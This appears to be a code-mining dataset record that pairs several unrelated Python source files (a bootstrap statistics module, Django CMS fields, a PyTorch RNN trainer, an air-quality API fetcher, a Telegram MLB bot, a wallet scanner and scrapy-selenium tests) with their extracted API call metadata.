[((1314, 1357), 'm2m_demo.frontend.RegisterPage', 'RegisterPage', (['ScriptletsPage', '"""/scriptlets"""'], {}), "(ScriptletsPage, '/scriptlets')\n", (1326, 1357), False, 'from m2m_demo.frontend import RegisterPage, BaseResource\n'), ((663, 676), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (674, 676), False, 'from collections import OrderedDict\n'), ((697, 738), 'os.path.join', 'os.path.join', (["cfg['assets']", '"""scriptlets"""'], {}), "(cfg['assets'], 'scriptlets')\n", (709, 738), False, 'import json, os, re\n'), ((768, 790), 'os.walk', 'os.walk', (['scriptlet_dir'], {}), '(scriptlet_dir)\n', (775, 790), False, 'import json, os, re\n'), ((1283, 1305), 'json.dumps', 'json.dumps', (['scriptlets'], {}), '(scriptlets)\n', (1293, 1305), False, 'import json, os, re\n'), ((904, 937), 're.search', 're.search', (['"""_(.*)\\\\.py"""', 'filename'], {}), "('_(.*)\\\\.py', filename)\n", (913, 937), False, 'import json, os, re\n'), ((851, 879), 'os.path.join', 'os.path.join', (['root', 'filename'], {}), '(root, filename)\n', (863, 879), False, 'import json, os, re\n')]
|
import numpy as np
import multiprocessing
from abito.lib.stats.weighted import _quantile_sorted, _sort_obs
__all__ = ['generate_bootstrap_estimates']
def _do_bootstrap_plain(obs, stat_func, stat_args, n_iters, seed):
np.random.seed(seed)
nobs = obs.shape[0]
result = []
for i in range(n_iters):
new_ind = np.random.choice(nobs, nobs, replace=True)
obs_new = obs[new_ind]
result.append(stat_func(obs_new, **stat_args))
return result
def _do_bootstrap_weighted(obs, weights, stat_func, stat_args, n_iters, seed):
np.random.seed(seed)
if stat_func.__name__ == 'quantile':
obs, weights = _sort_obs(obs, weights)
stat_func = _quantile_sorted
nobs = weights.sum()
ps = weights / nobs
result = []
for i in range(n_iters):
new_weights = np.random.multinomial(nobs, ps)
weights = new_weights
result.append(stat_func(weights=weights, obs=obs, **stat_args))
return result
def _prepare_bootstrap_procedure(obs, weights, stat_func, n_iters, **stat_args):
if weights.shape[0] == 0:
func = _do_bootstrap_plain
args = (obs, stat_func, stat_args, n_iters)
else:
func = _do_bootstrap_weighted
args = (obs, weights, stat_func, stat_args, n_iters)
return func, args
def generate_bootstrap_estimates(obs, stat_func, n_iters, weights=np.empty(0), n_threads=1, **stat_args):
n_threads = multiprocessing.cpu_count() if n_threads == -1 else n_threads
if n_threads <= 1:
func, args = _prepare_bootstrap_procedure(obs, weights, stat_func, n_iters, **stat_args)
seed = np.random.randint(2**32)
results = np.asarray(func(*args, seed))
else:
with multiprocessing.Pool(n_threads) as pool:
n_iters_per_thread = int(n_iters / n_threads)
pool_results = []
seeds = np.random.randint(2**32, size=n_threads)
for seed in seeds:
func, args = _prepare_bootstrap_procedure(obs, weights, stat_func, n_iters_per_thread, **stat_args)
r = pool.apply_async(func, (*args, seed))
pool_results.append(r)
results = []
[results.extend(r.get()) for r in pool_results]
results = np.asarray(results)
return results
|
[
"numpy.random.seed",
"abito.lib.stats.weighted._sort_obs",
"numpy.empty",
"numpy.random.multinomial",
"numpy.asarray",
"multiprocessing.Pool",
"numpy.random.randint",
"numpy.random.choice",
"multiprocessing.cpu_count"
] |
[((225, 245), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (239, 245), True, 'import numpy as np\n'), ((566, 586), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (580, 586), True, 'import numpy as np\n'), ((1382, 1393), 'numpy.empty', 'np.empty', (['(0)'], {}), '(0)\n', (1390, 1393), True, 'import numpy as np\n'), ((334, 376), 'numpy.random.choice', 'np.random.choice', (['nobs', 'nobs'], {'replace': '(True)'}), '(nobs, nobs, replace=True)\n', (350, 376), True, 'import numpy as np\n'), ((652, 675), 'abito.lib.stats.weighted._sort_obs', '_sort_obs', (['obs', 'weights'], {}), '(obs, weights)\n', (661, 675), False, 'from abito.lib.stats.weighted import _quantile_sorted, _sort_obs\n'), ((831, 862), 'numpy.random.multinomial', 'np.random.multinomial', (['nobs', 'ps'], {}), '(nobs, ps)\n', (852, 862), True, 'import numpy as np\n'), ((1438, 1465), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (1463, 1465), False, 'import multiprocessing\n'), ((1635, 1661), 'numpy.random.randint', 'np.random.randint', (['(2 ** 32)'], {}), '(2 ** 32)\n', (1652, 1661), True, 'import numpy as np\n'), ((1731, 1762), 'multiprocessing.Pool', 'multiprocessing.Pool', (['n_threads'], {}), '(n_threads)\n', (1751, 1762), False, 'import multiprocessing\n'), ((1880, 1922), 'numpy.random.randint', 'np.random.randint', (['(2 ** 32)'], {'size': 'n_threads'}), '(2 ** 32, size=n_threads)\n', (1897, 1922), True, 'import numpy as np\n'), ((2272, 2291), 'numpy.asarray', 'np.asarray', (['results'], {}), '(results)\n', (2282, 2291), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
from functools import partial
from django.core.validators import MaxValueValidator
from django.db import models
from django.db.models.fields import PositiveIntegerField
from cms.models.pluginmodel import CMSPlugin
import sortedm2m.fields
from allink_core.core.forms import fields
# Add an app namespace to related_name to avoid field name clashes
# with any other plugins that have a field with the same name as the
# lowercase of the class name of this model.
# https://github.com/divio/django-cms/issues/5030
CMSPluginField = partial(
models.OneToOneField,
to=CMSPlugin,
on_delete=models.CASCADE,
related_name='%(app_label)s_%(class)s',
parent_link=True,
)
class Icon(models.CharField):
default_field_class = fields.Icon
south_field_class = 'django.db.models.fields.CharField'
def __init__(self, *args, **kwargs):
if 'verbose_name' not in kwargs:
kwargs['verbose_name'] = 'Icon'
if 'max_length' not in kwargs:
kwargs['max_length'] = 255
if 'blank' not in kwargs:
kwargs['blank'] = True
if 'default' not in kwargs:
kwargs['default'] = self.default_field_class.DEFAULT
super(Icon, self).__init__(*args, **kwargs)
def formfield(self, **kwargs):
defaults = {
'form_class': self.default_field_class,
}
defaults.update(kwargs)
return super(Icon, self).formfield(**defaults)
class SortedM2MModelField(sortedm2m.fields.SortedManyToManyField):
default_field_class = fields.SortedM2MFormField
def formfield(self, **kwargs):
defaults = {
'form_class': self.default_field_class,
}
defaults.update(kwargs)
return super(SortedM2MModelField, self).formfield(**defaults)
|
[
"functools.partial"
] |
[((554, 685), 'functools.partial', 'partial', (['models.OneToOneField'], {'to': 'CMSPlugin', 'on_delete': 'models.CASCADE', 'related_name': '"""%(app_label)s_%(class)s"""', 'parent_link': '(True)'}), "(models.OneToOneField, to=CMSPlugin, on_delete=models.CASCADE,\n related_name='%(app_label)s_%(class)s', parent_link=True)\n", (561, 685), False, 'from functools import partial\n')]
|
import argparse
import data
import models
from torch.utils.data import DataLoader
from torch.optim import Adam
from torch.optim.lr_scheduler import ExponentialLR
from torch.nn import BCEWithLogitsLoss
from torch import cuda
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--epochs', type=int, default=5)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=1-1e-5)
parser.add_argument('--embedding_size', type=int, default=300)
parser.add_argument('--hidden_size', type=int, default=150)
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--clip', type=float, default=None)
parser.add_argument('--num_layers', type=int, default=2)
parser.add_argument('--rnn', choices=['vanilla', 'lstm', 'gru'], default='lstm')
parser.add_argument('--bidirectional', action='store_true', default=False)
args = parser.parse_args()
train_dataset = data.NLPDataset.from_file('data/sst_train_raw.csv')
text_vocab = train_dataset.text_vocab
labels_vocab = train_dataset.labels_vocab
test_dataset = data.NLPDataset.from_file('data/sst_test_raw.csv', text_vocab, labels_vocab)
val_dataset = data.NLPDataset.from_file('data/sst_valid_raw.csv', text_vocab, labels_vocab)
embedding = text_vocab.create_embedding_matrix(args.embedding_size, path_to_embeddings='data/sst_glove_6b_300d.txt')
# model = models.AvgPoolingModel(embedding, embedding_size=args.embedding_size)
model = models.RNNModel(
args.rnn,
embedding,
input_size=args.embedding_size,
hidden_size=args.hidden_size,
num_layers=args.num_layers,
bidirectional=args.bidirectional
)
optimizer = Adam(model.parameters(), lr=args.lr)
scheduler = ExponentialLR(optimizer, gamma=args.gamma)
criterion = BCEWithLogitsLoss()
if cuda.is_available():
print("Using GPU")
model.to('cuda')
for epoch in range(args.epochs):
train_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True,
collate_fn=data.pad_collate_fn)
val_dataloader = DataLoader(val_dataset, batch_size=args.batch_size, shuffle=True, collate_fn=data.pad_collate_fn)
models.train(model, train_dataloader, optimizer, criterion, scheduler, args.clip)
metrics = models.evaluate(model, val_dataloader, criterion)
print(f"Epoch {epoch+1}: validation loss = {metrics['loss']} validation accuracy: {metrics['accuracy']}")
test_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=True, collate_fn=data.pad_collate_fn)
metrics = models.evaluate(model, test_dataloader, criterion)
print()
print(f"Test loss = {metrics['loss']} test accuracy = {metrics['accuracy']}")
cuda.empty_cache()
|
[
"models.train",
"torch.nn.BCEWithLogitsLoss",
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"data.NLPDataset.from_file",
"models.evaluate",
"models.RNNModel",
"torch.cuda.is_available",
"torch.optim.lr_scheduler.ExponentialLR",
"torch.cuda.empty_cache"
] |
[((266, 291), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (289, 291), False, 'import argparse\n'), ((1000, 1051), 'data.NLPDataset.from_file', 'data.NLPDataset.from_file', (['"""data/sst_train_raw.csv"""'], {}), "('data/sst_train_raw.csv')\n", (1025, 1051), False, 'import data\n'), ((1159, 1235), 'data.NLPDataset.from_file', 'data.NLPDataset.from_file', (['"""data/sst_test_raw.csv"""', 'text_vocab', 'labels_vocab'], {}), "('data/sst_test_raw.csv', text_vocab, labels_vocab)\n", (1184, 1235), False, 'import data\n'), ((1254, 1331), 'data.NLPDataset.from_file', 'data.NLPDataset.from_file', (['"""data/sst_valid_raw.csv"""', 'text_vocab', 'labels_vocab'], {}), "('data/sst_valid_raw.csv', text_vocab, labels_vocab)\n", (1279, 1331), False, 'import data\n'), ((1550, 1719), 'models.RNNModel', 'models.RNNModel', (['args.rnn', 'embedding'], {'input_size': 'args.embedding_size', 'hidden_size': 'args.hidden_size', 'num_layers': 'args.num_layers', 'bidirectional': 'args.bidirectional'}), '(args.rnn, embedding, input_size=args.embedding_size,\n hidden_size=args.hidden_size, num_layers=args.num_layers, bidirectional\n =args.bidirectional)\n', (1565, 1719), False, 'import models\n'), ((1835, 1877), 'torch.optim.lr_scheduler.ExponentialLR', 'ExponentialLR', (['optimizer'], {'gamma': 'args.gamma'}), '(optimizer, gamma=args.gamma)\n', (1848, 1877), False, 'from torch.optim.lr_scheduler import ExponentialLR\n'), ((1894, 1913), 'torch.nn.BCEWithLogitsLoss', 'BCEWithLogitsLoss', ([], {}), '()\n', (1911, 1913), False, 'from torch.nn import BCEWithLogitsLoss\n'), ((1922, 1941), 'torch.cuda.is_available', 'cuda.is_available', ([], {}), '()\n', (1939, 1941), False, 'from torch import cuda\n'), ((2617, 2719), 'torch.utils.data.DataLoader', 'DataLoader', (['test_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'collate_fn': 'data.pad_collate_fn'}), '(test_dataset, batch_size=args.batch_size, shuffle=True,\n collate_fn=data.pad_collate_fn)\n', (2627, 
2719), False, 'from torch.utils.data import DataLoader\n'), ((2730, 2780), 'models.evaluate', 'models.evaluate', (['model', 'test_dataloader', 'criterion'], {}), '(model, test_dataloader, criterion)\n', (2745, 2780), False, 'import models\n'), ((2879, 2897), 'torch.cuda.empty_cache', 'cuda.empty_cache', ([], {}), '()\n', (2895, 2897), False, 'from torch import cuda\n'), ((2060, 2163), 'torch.utils.data.DataLoader', 'DataLoader', (['train_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'collate_fn': 'data.pad_collate_fn'}), '(train_dataset, batch_size=args.batch_size, shuffle=True,\n collate_fn=data.pad_collate_fn)\n', (2070, 2163), False, 'from torch.utils.data import DataLoader\n'), ((2223, 2324), 'torch.utils.data.DataLoader', 'DataLoader', (['val_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'collate_fn': 'data.pad_collate_fn'}), '(val_dataset, batch_size=args.batch_size, shuffle=True,\n collate_fn=data.pad_collate_fn)\n', (2233, 2324), False, 'from torch.utils.data import DataLoader\n'), ((2330, 2416), 'models.train', 'models.train', (['model', 'train_dataloader', 'optimizer', 'criterion', 'scheduler', 'args.clip'], {}), '(model, train_dataloader, optimizer, criterion, scheduler, args\n .clip)\n', (2342, 2416), False, 'import models\n'), ((2430, 2479), 'models.evaluate', 'models.evaluate', (['model', 'val_dataloader', 'criterion'], {}), '(model, val_dataloader, criterion)\n', (2445, 2479), False, 'import models\n')]
|
# -*- coding: utf-8 -*-
#
from __future__ import absolute_import
import os
import sys
def is_frozen():
"""
:return: True if the executable is currently frozen
"""
return getattr(sys, 'frozen', False)
def _resource_path_frozen(relative_path):
"""
:return: PyInstaller frozen path to resource
"""
base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
return os.path.join(base_path, relative_path)
def _resource_path_dev(relative_path):
"""
:return: Package relative path to resource
"""
base_path = os.path.dirname(os.path.abspath(__file__))
return os.path.join(base_path, relative_path)
def resource_path(relative_path):
"""
Get absolute path to resource, works for dev and for PyInstaller
"""
return _resource_path_frozen(relative_path) if is_frozen() else _resource_path_dev(relative_path)
|
[
"os.path.abspath",
"os.path.join"
] |
[((424, 462), 'os.path.join', 'os.path.join', (['base_path', 'relative_path'], {}), '(base_path, relative_path)\n', (436, 462), False, 'import os\n'), ((637, 675), 'os.path.join', 'os.path.join', (['base_path', 'relative_path'], {}), '(base_path, relative_path)\n', (649, 675), False, 'import os\n'), ((599, 624), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (614, 624), False, 'import os\n'), ((385, 410), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (400, 410), False, 'import os\n')]
|
import math
import torch
from torch.nn.parameter import Parameter
from torch.nn.modules.module import Module
import torch.nn as nn
from torch.nn import functional as F
import numpy as np
class Relational_Embeding(Module):
"""
"""
def __init__(self, input_dim, output_dim, hr=2,bias=True):
super(Relational_Embeding, self).__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.W = nn.Parameter(torch.FloatTensor(input_dim, input_dim))
#self.W = nn.Parameter(nn.init.xavier_uniform(torch.Tensor(input_dim, int(input_dim / hr)).type(torch.cuda.FloatTensor if torch.cuda.is_available() else torch.FloatTensor), gain=np.sqrt(2.0)))
self.H = nn.Parameter(torch.FloatTensor(input_dim, int(input_dim / hr)))
self.fc0 = nn.Linear(int(input_dim / hr), input_dim)
#self.fc0.weight = torch.nn.init.xavier_normal(self.fc0.weight, gain=np.sqrt(2.0))
self.fc1 = nn.Linear(input_dim, output_dim)
#self.fc1.weight = torch.nn.init.xavier_normal(self.fc1.weight, gain=np.sqrt(2.0))
self.reset_parameters()
def reset_parameters(self):
stdv = 1. / math.sqrt(self.W.size(1))
self.W.data.uniform_(-stdv, stdv)
stdv = 1. / math.sqrt(self.H.size(1))
self.H.data.uniform_(-stdv, stdv)
stdv = 1. / math.sqrt(self.fc0.weight.size(1))
self.fc0.weight.data.uniform_(-stdv, stdv)
stdv = 1. / math.sqrt(self.fc1.weight.size(1))
self.fc1.weight.data.uniform_(-stdv, stdv)
def forward(self, input, im_inds):
'''
Args:
input: shape: num_obj, hid_dim
adj: shape: num_obj, num_obj
Returns:
'''
#print('input: ',input)
rel1_ = F.sigmoid(torch.mm(torch.mm(input, self.W), input.permute(1, 0)))
#print('rel1_: ', rel1_)
rel1_exp = torch.exp(rel1_)
rel1_exp = rel1_exp * (im_inds[:,None]==im_inds[None,:]).type_as(rel1_exp)
#print('rel1_exp: ', rel1_exp)
#print('(torch.sum(rel1_exp, -1)+1e-8): ',(torch.sum(rel1_exp, -1)+1e-8)[:,None])
rel1 = rel1_exp / (torch.sum(rel1_exp, -1)+1e-8)[:,None]
#print('rel1: ', rel1)
output1 = input + self.fc0(torch.mm(rel1, torch.mm(input, self.H)))
output2 = self.fc1(output1)
return output1, output2
|
[
"torch.FloatTensor",
"torch.mm",
"torch.exp",
"torch.nn.Linear",
"torch.sum"
] |
[((976, 1008), 'torch.nn.Linear', 'nn.Linear', (['input_dim', 'output_dim'], {}), '(input_dim, output_dim)\n', (985, 1008), True, 'import torch.nn as nn\n'), ((1936, 1952), 'torch.exp', 'torch.exp', (['rel1_'], {}), '(rel1_)\n', (1945, 1952), False, 'import torch\n'), ((477, 516), 'torch.FloatTensor', 'torch.FloatTensor', (['input_dim', 'input_dim'], {}), '(input_dim, input_dim)\n', (494, 516), False, 'import torch\n'), ((1835, 1858), 'torch.mm', 'torch.mm', (['input', 'self.W'], {}), '(input, self.W)\n', (1843, 1858), False, 'import torch\n'), ((2196, 2219), 'torch.sum', 'torch.sum', (['rel1_exp', '(-1)'], {}), '(rel1_exp, -1)\n', (2205, 2219), False, 'import torch\n'), ((2317, 2340), 'torch.mm', 'torch.mm', (['input', 'self.H'], {}), '(input, self.H)\n', (2325, 2340), False, 'import torch\n')]
|
# env: py3
# Author: <NAME>
import pandas as pd
import datetime
import urllib
from urllib.request import urlopen
def AirNow():
baseURL = "http://www.airnowapi.org/aq/forecast/"
api_key = '###YOUR_API_KEY###'
#date = '2018-08-04'
# get the current date as input
now = datetime.datetime.now()
date = str(now)
miles = 25
dfs = list()
text_file = open("INPUT.txt", "r")
latlong = text_file.read().split(' ')
text_file.close()
lat = latlong[0::2]
lon = latlong[1::2]
for lats, lons in zip(lat, lon):
latlonURL = baseURL + "latLong/?" + urllib.parse.urlencode({
'format': 'application/json',
'latitude': lats,
'longitude': lons,
'date': date[:10],
'distance': miles,
'API_KEY': api_key
})
response = urlopen(latlonURL).read().decode('utf-8')
df = pd.read_json(response)
#df = df.assign(Zipcode=zipcode)
dfs.append(df)
results = pd.concat(dfs)
#columns = ['ActionDay', 'Category', 'DateIssue', 'Discussion', 'Latitude', 'Longitude']
#results.drop(columns, inplace=True, axis=1)
return results
def main():
results = AirNow()
print("\nAQI data collected:\n\n", results)
results.to_csv('AQI_output.csv', index=False)
if __name__ == "__main__":
main()
|
[
"urllib.parse.urlencode",
"urllib.request.urlopen",
"pandas.read_json",
"datetime.datetime.now",
"pandas.concat"
] |
[((287, 310), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (308, 310), False, 'import datetime\n'), ((970, 984), 'pandas.concat', 'pd.concat', (['dfs'], {}), '(dfs)\n', (979, 984), True, 'import pandas as pd\n'), ((873, 895), 'pandas.read_json', 'pd.read_json', (['response'], {}), '(response)\n', (885, 895), True, 'import pandas as pd\n'), ((581, 738), 'urllib.parse.urlencode', 'urllib.parse.urlencode', (["{'format': 'application/json', 'latitude': lats, 'longitude': lons, 'date':\n date[:10], 'distance': miles, 'API_KEY': api_key}"], {}), "({'format': 'application/json', 'latitude': lats,\n 'longitude': lons, 'date': date[:10], 'distance': miles, 'API_KEY':\n api_key})\n", (603, 738), False, 'import urllib\n'), ((820, 838), 'urllib.request.urlopen', 'urlopen', (['latlonURL'], {}), '(latlonURL)\n', (827, 838), False, 'from urllib.request import urlopen\n')]
|
from telegram.ext import Updater
import logging
from telegram.ext import CommandHandler
import mlbgame
import datetime
updater = Updater(token='<KEY>')
dispatcher = updater.dispatcher
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',level=logging.INFO)
def start(bot, update):
bot.send_message(chat_id=update.message.chat_id, text="Hello I am the bot that will help you to know the MLB results")
def today_stats(bot, update):
today = datetime.date.today()
year = today.year
month = today.month
day = today.day
games = mlbgame.day(year, month, day)
msg = ""
for game in games:
game_txt = "{}\n".format(game)
msg += game_txt
bot.send_message(chat_id=update.message.chat_id, text=msg)
start_handler = CommandHandler('start', start)
stats_handler = CommandHandler('today', today_stats)
dispatcher.add_handler(start_handler)
dispatcher.add_handler(stats_handler)
updater.start_polling()
|
[
"logging.basicConfig",
"mlbgame.day",
"datetime.date.today",
"telegram.ext.Updater",
"telegram.ext.CommandHandler"
] |
[((130, 152), 'telegram.ext.Updater', 'Updater', ([], {'token': '"""<KEY>"""'}), "(token='<KEY>')\n", (137, 152), False, 'from telegram.ext import Updater\n'), ((185, 292), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""', 'level': 'logging.INFO'}), "(format=\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n", (204, 292), False, 'import logging\n'), ((786, 816), 'telegram.ext.CommandHandler', 'CommandHandler', (['"""start"""', 'start'], {}), "('start', start)\n", (800, 816), False, 'from telegram.ext import CommandHandler\n'), ((833, 869), 'telegram.ext.CommandHandler', 'CommandHandler', (['"""today"""', 'today_stats'], {}), "('today', today_stats)\n", (847, 869), False, 'from telegram.ext import CommandHandler\n'), ((477, 498), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (496, 498), False, 'import datetime\n'), ((577, 606), 'mlbgame.day', 'mlbgame.day', (['year', 'month', 'day'], {}), '(year, month, day)\n', (588, 606), False, 'import mlbgame\n')]
|
from Python_libraries.SC_flow import SC_flow
import requests
from Python_libraries.const import *
from Python_libraries.Users import get_users, get_user_address
def scan_wallet(user_address) :
# api-endpoint
URL = "https://devnet-api.elrond.com"
# sending get request and saving the response as response object
nfts_requests = requests.get(url = URL+"/accounts/"+user_address+"/nfts")
tokens_requests = requests.get(url = URL+"/accounts/"+user_address+"/tokens")
print("\n" + 20*"*" + "Tokens" + 20*"*" + "\n")
for token in tokens_requests.json() :
if token["identifier"] in AUTHORIZED_TOKENS :
amount = int(float(token["balance"])/10**float(token["decimals"]))
print(f"{amount} "+token["identifier"])
print("\n" + 20*"*" + "NFTs" + 20*"*" + "\n")
for nft in nfts_requests.json() :
id_collection = nft["collection"]
if id_collection not in AUTHORIZED_TOKENS :
continue
if nft["type"] == "SemiFungibleESDT" :
amount = nft["balance"]
print(f"{amount} SFT of collection {id_collection} ")
elif nft["type"] == "MetaESDT" :
amount = int(float(nft["balance"])/10**float(nft["decimals"]))
print(f"{amount} {id_collection} ")
else:
id_NFT = nft["nonce"]
print(f"NFT n°{id_NFT} of collection {id_collection} ")
# Use the smart contract object
smart_contract = SC_flow()
print("\n Wallet buyer : ")
scan_wallet(get_user_address(get_users()["alice"]))
print("\nWallet seller : ")
scan_wallet(get_user_address(get_users()["bob"]))
|
[
"Python_libraries.Users.get_users",
"Python_libraries.SC_flow.SC_flow",
"requests.get"
] |
[((1479, 1488), 'Python_libraries.SC_flow.SC_flow', 'SC_flow', ([], {}), '()\n', (1486, 1488), False, 'from Python_libraries.SC_flow import SC_flow\n'), ((347, 408), 'requests.get', 'requests.get', ([], {'url': "(URL + '/accounts/' + user_address + '/nfts')"}), "(url=URL + '/accounts/' + user_address + '/nfts')\n", (359, 408), False, 'import requests\n'), ((427, 490), 'requests.get', 'requests.get', ([], {'url': "(URL + '/accounts/' + user_address + '/tokens')"}), "(url=URL + '/accounts/' + user_address + '/tokens')\n", (439, 490), False, 'import requests\n'), ((1549, 1560), 'Python_libraries.Users.get_users', 'get_users', ([], {}), '()\n', (1558, 1560), False, 'from Python_libraries.Users import get_users, get_user_address\n'), ((1630, 1641), 'Python_libraries.Users.get_users', 'get_users', ([], {}), '()\n', (1639, 1641), False, 'from Python_libraries.Users import get_users, get_user_address\n')]
|
import unittest
class TestGetNameBaseForObject(unittest.TestCase):
def test_get_name_base_for_object(self):
# self.assertEqual(expected, get_name_base_for_object(obj))
assert False # TODO: implement your test here
class TestGetNextName(unittest.TestCase):
def test_get_next_name(self):
# self.assertEqual(expected, get_next_name(names, base))
assert False # TODO: implement your test here
class TestAssignNameToObject(unittest.TestCase):
def test_assign_name_to_object(self):
# self.assertEqual(expected, assign_name_to_object(obj, assigned_names, rename))
assert False # TODO: implement your test here
class TestAssignNamesToObjects(unittest.TestCase):
def test_assign_names_to_objects(self):
# self.assertEqual(expected, assign_names_to_objects(objects, names, rename))
assert False # TODO: implement your test here
class TestObjectsOnly(unittest.TestCase):
def test_objects_only(self):
# self.assertEqual(expected, objects_only(events))
assert False # TODO: implement your test here
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main"
] |
[((1129, 1144), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1142, 1144), False, 'import unittest\n')]
|
"""This module contains the test cases for the middlewares of the ``scrapy_selenium`` package"""
from shutil import which
from unittest import TestCase
from unittest.mock import patch
from scrapy import Request, Spider
from scrapy.exceptions import NotConfigured
from scrapy.settings import Settings
from scrapy.utils.test import get_crawler
from scrapy_selenium.http import SeleniumRequest
from scrapy_selenium.middlewares import SeleniumMiddleware
class SeleniumMiddlewareTestCase(TestCase):
"""Test case for the ``SeleniumMiddleware`` middleware"""
def setUp(self):
"""Initialize the middleware"""
self.settings = Settings({
'SELENIUM_DRIVER_NAME': 'firefox',
'SELENIUM_DRIVER_EXECUTABLE_PATH': which('geckodriver'),
'SELENIUM_DRIVER_ARGUMENTS': ['-headless']
})
self.crawler = get_crawler(Spider, self.settings)
self.spider = self.crawler._create_spider('foo')
self.mw = SeleniumMiddleware.from_crawler(self.crawler)
def tearDown(self):
"""Close the selenium webdriver"""
self.mw.driver.quit()
def test_from_crawler_method_exception(self):
settings = Settings({'SELENIUM_DRIVER_ARGUMENTS': ['-headless']})
crawler = get_crawler(Spider, settings)
with self.assertRaisesRegex(NotConfigured, 'SELENIUM_DRIVER_NAME'):
SeleniumMiddleware.from_crawler(crawler)
settings.update({"SELENIUM_DRIVER_NAME": 'firefox'})
crawler = get_crawler(Spider, settings)
with self.assertRaisesRegex(NotConfigured, 'SELENIUM_DRIVER_EXECUTABLE_PATH'):
SeleniumMiddleware.from_crawler(crawler)
settings.update({'SELENIUM_DRIVER_EXECUTABLE_PATH': which('geckodriver')})
crawler = get_crawler(Spider, settings)
mw = SeleniumMiddleware.from_crawler(crawler)
mw.driver.quit()
def test_from_crawler_method_via_browser_executable_path(self):
self.settings.update({'SELENIUM_DRIVER_NAME': 'firefox'})
self.settings.update({'SELENIUM_BROWSER_EXECUTABLE_PATH': which('firefox')})
crawler = get_crawler(Spider, self.settings)
mw = SeleniumMiddleware.from_crawler(crawler)
self.assertEqual(which('firefox'), mw.driver.binary._start_cmd)
mw.driver.close()
def test_from_crawler_method_should_initialize_the_driver(self):
"""Test that the ``from_crawler`` method should initialize the selenium driver"""
crawler = get_crawler(Spider, self.settings)
mw = SeleniumMiddleware.from_crawler(crawler)
# The driver must be initialized
self.assertIsNotNone(mw.driver)
# We can now use the driver
mw.driver.get('http://www.python.org')
self.assertIn('Python', mw.driver.title)
mw.driver.close()
def test_from_crawler_method_should_initialize_the_grid(self):
"""Test that the ``from_crawler`` method should initialize the selenium grid"""
self.settings.update({
'SELENIUM_REMOTE_URL': 'http://localhost:4444/wd/hub'
})
crawler = get_crawler(Spider, self.settings)
mw = SeleniumMiddleware.from_crawler(crawler)
mw.driver.get('http://www.python.org')
self.assertIn('Python', mw.driver.title)
mw.driver.close()
def test_spider_closed_should_close_the_driver(self):
"""Test that the ``spider_closed`` method should close the driver"""
crawler = get_crawler(Spider, self.settings)
mw = SeleniumMiddleware.from_crawler(crawler)
with patch.object(mw.driver, 'quit') as mocked_quit:
mw.spider_closed()
mocked_quit.assert_called_once()
def test_process_request_should_return_none_if_not_selenium_request(self):
"""Test that the ``process_request`` should return none if not selenium request"""
scrapy_request = Request(url='http://not-an-url')
self.assertIsNone(
self.mw.process_request(
request=scrapy_request,
spider=None
)
)
def test_process_request_should_return_a_response_if_selenium_request(self):
"""Test that the ``process_request`` should return a response if selenium request"""
selenium_request = SeleniumRequest(url='http://www.python.org')
html_response = self.mw.process_request(
request=selenium_request,
spider=None
)
# We have access to the driver on the response via the "meta"
self.assertEqual(
html_response.meta['driver'],
self.mw.driver
)
# We also have access to the "selector" attribute on the response
self.assertEqual(
html_response.selector.xpath('//title/text()').extract_first(),
'Welcome to Python.org'
)
def test_process_request_should_return_a_screenshot_if_screenshot_option(self):
"""Test that the ``process_request`` should return a response with a screenshot"""
selenium_request = SeleniumRequest(
url='http://www.python.org',
screenshot=True
)
html_response = self.mw.process_request(
request=selenium_request,
spider=None
)
self.assertIsNotNone(html_response.meta['screenshot'])
def test_process_request_should_execute_script_if_script_option(self):
"""Test that the ``process_request`` should execute the script and return a response"""
selenium_request = SeleniumRequest(
url='http://www.python.org',
script='document.title = "scrapy_selenium";'
)
html_response = self.mw.process_request(
request=selenium_request,
spider=None
)
self.assertEqual(
html_response.selector.xpath('//title/text()').extract_first(),
'scrapy_selenium'
)
|
[
"unittest.mock.patch.object",
"scrapy.Request",
"scrapy.settings.Settings",
"scrapy_selenium.http.SeleniumRequest",
"shutil.which",
"scrapy.utils.test.get_crawler",
"scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler"
] |
